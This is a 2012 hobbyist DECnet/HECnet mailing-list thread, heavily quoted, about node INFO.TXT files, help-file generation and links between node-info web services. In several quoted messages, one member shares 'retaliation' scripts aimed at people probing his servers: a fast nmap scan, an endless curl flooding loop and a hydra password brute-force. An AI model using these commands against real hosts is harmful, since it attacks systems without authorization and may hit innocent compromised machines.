Hi,
Area 51 now has an info.txt on every node.
I am not showing up in the map you did the other day should I be worried ?
Dan
On 29 December 2012 10:36, <sampsa at mac.com> wrote:
If you don't want to send me a HLP file I can now automatically generate one from your INFO.TXT file.
Let me know if you want your node added to the automatically generated help file list.
Sampsa
On 29 Dec 2012, at 12:32, Johnny Billquist <bqt at softjar.se> wrote:
On 2012-12-29 18:21, sampsa at mac.com wrote:
I occasionally get people trying to get into the Internet facing parts of my stuff, I usually reply with these:
--- cznmap --- runs nmap at timing=INSANE to find open ports
nmap -T5 -sV $1
--- end cznmap ---
There's usually something serving HTTP, after which I run this:
--- fcku ---
while :
do
curl http://$1:$2/FUCKYOU &> /dev/null
done
--- end fcku ---
Stops the login attempts pretty quickly I've found.
I usually just ignore that stuff. There is constant probing of my web server on MIM. It's kindof fun to see all kind of stuff they are trying. Also a good reference to see all kind of problems and exploits that exists on Unix and Windows web servers...
(I *think* my RSX web server is actually pretty safe, but who knows )
I highly doubt any script kiddies would have RSX experience. ;)
Trying to retaliate would be an endless battle which I don't care about anyway...
But it is fun to see people fail. :-)
It is definitely fun to watch people try to break in to VMS. ;)
Johnny
--
Cory Smelosky
http://gewt.net/ Personal stuff!
http://gimme-sympathy.org/ My permanently-a-work-in-progress pet project.
On 12/29/2012 10:00 AM, sampsa at mac.com wrote:
type nikkel::info.txt
%TYPE-W-SEARCHFAIL, error searching for NIKKEL::INFO.TXT;
-RMS-E-FND, ACP file or directory lookup failed
-SYSTEM-F-INVLOGIN, login information invalid at remote node
Won't work until there's a default FAL user and an INFO.TXT...
So what's supposed to be in this INFO.TXT file that everyone's been
talking about lately? I think I may be too much of a newcomer here to
know about it. Where should it be, and what should it contain?
-Dave
--
Dave McGuire, AK4HZ
New Kensington, PA
On 12/29/2012 09:38 AM, Johnny Billquist wrote:
How loud is the 7720?
Nowhere near an 8650. :-)
That's for sure. ROAR!!
-Dave
--
Dave McGuire, AK4HZ
New Kensington, PA
I usually just ignore that stuff. There is constant probing of my web server on MIM. It's kindof fun to see all kind of stuff they are trying. Also a good reference to see all kind of problems and exploits that exists on Unix and Windows web servers...
(I *think* my RSX web server is actually pretty safe, but who knows...)
Trying to retaliate would be an endless battle which I don't care about anyway...
But attacking them back is kinda funny, oh here's one more script in case there's no HTTP:
--- gohydra ---
#p1 = host, p2 = port, p3 = service
hydra -P ~/words -l fuckyou -s $2 $1 $3
--- end gohydra ---
On 2012-12-29 18:21, sampsa at mac.com wrote:
I occasionally get people trying to get into the Internet facing parts of my stuff, I usually reply with these:
--- cznmap --- runs nmap at timing=INSANE to find open ports
nmap -T5 -sV $1
--- end cznmap ---
There's usually something serving HTTP, after which I run this:
--- fcku ---
while :
do
curl http://$1:$2/FUCKYOU &> /dev/null
done
--- end fcku ---
Stops the login attempts pretty quickly I've found.
I usually just ignore that stuff. There is constant probing of my web server on MIM. It's kindof fun to see all kind of stuff they are trying. Also a good reference to see all kind of problems and exploits that exists on Unix and Windows web servers...
(I *think* my RSX web server is actually pretty safe, but who knows...)
Trying to retaliate would be an endless battle which I don't care about anyway...
But it is fun to see people fail. :-)
Johnny
I occasionally get people trying to get into the Internet facing parts of my stuff, I usually reply with these:
--- cznmap --- runs nmap at timing=INSANE to find open ports
nmap -T5 -sV $1
--- end cznmap ---
There's usually something serving HTTP, after which I run this:
--- fcku ---
while :
do
curl http://$1:$2/FUCKYOU &> /dev/null
done
--- end fcku ---
Stops the login attempts pretty quickly I've found.
---
Sampsa Laine <sampsa at mac.com>
On 29 Dec 2012, at 18:43, sampsa at mac.com wrote:
On 29 Dec 2012, at 18:12, Johnny Billquist <bqt at softjar.se> wrote:
Sure. Why not. I can add a link on my page as well, and I could add a couple of links on my Hecnet page... I'll do that.
Anyone else have some web resource that would be nice to have a link to from the HECnet page?
Johnny
Actually since we're using GETs, we could put the link in the RESULTS, so it goes and gets the info for that node from the other service in another window.
Adding that now.
Sampsa
Done. Check out http://rhesus.sampsa.com/cgi-bin/hecnetinfo/hecnetinfo.com?q=chimpy
At the bottom of the info.txt is a link to your service.
Sampsa
On 29 Dec 2012, at 18:12, Johnny Billquist <bqt at softjar.se> wrote:
Sure. Why not. I can add a link on my page as well, and I could add a couple of links on my Hecnet page... I'll do that.
Anyone else have some web resource that would be nice to have a link to from the HECnet page?
Johnny
Actually since we're using GETs, we could put the link in the RESULTS, so it goes and gets the info for that node from the other service in another window.
Adding that now.
Sampsa
On 2012-12-29 17:06, Bob Armstrong wrote:
... you have configured your DECnet with a large enough value in the
executive for maximum boradcast routers
How many broadcast routers are there on HECnet now?
Total? No idea. But there are around 15 or so on the bridge, I think.
Johnny